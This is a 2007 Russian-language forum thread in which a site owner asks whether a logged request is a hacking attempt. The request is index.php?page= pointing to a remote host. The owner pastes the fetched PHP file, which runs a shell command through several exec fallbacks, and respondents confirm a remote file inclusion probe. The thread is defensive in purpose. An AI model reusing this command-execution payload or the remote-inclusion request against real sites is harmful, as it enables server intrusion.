| |
|
|
| | В системе статистики обнаружил адрес типа
index.php?page=http://n0ne.net/id.txt
а вот код id.txt
<?php
echo "Mic22";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
exit;
|
это попытка взлома? | |
| |
|
|
| |
|
|
| |
для: куч1963
(10.09.2007 в 11:13)
| | | Наверняка.
Конкретно id - попытка получить идентификаторы пользователя и группы текущего процесса.
что за система статистики? | |
| |
|
|
| |
|
|
| |
для: Trianon
(10.09.2007 в 11:26)
| | | система статистики powercounter3.3.7 | |
| |
|
|
| |
|
|
| |
для: куч1963
(10.09.2007 в 11:34)
| | | index.php действительно может прямо или косвенно сделать include($_REQUEST['page']); ? | |
| |
|
|
| |
|
|
| |
для: Trianon
(10.09.2007 в 12:13)
| | | нет не может
входной только $_GET['id_article']
но проверяется
if(!preg_match("|^[\d]*$|",$_GET['id_article'])) exit("Недопустимый формат URL");
|
| |
| |
|
|
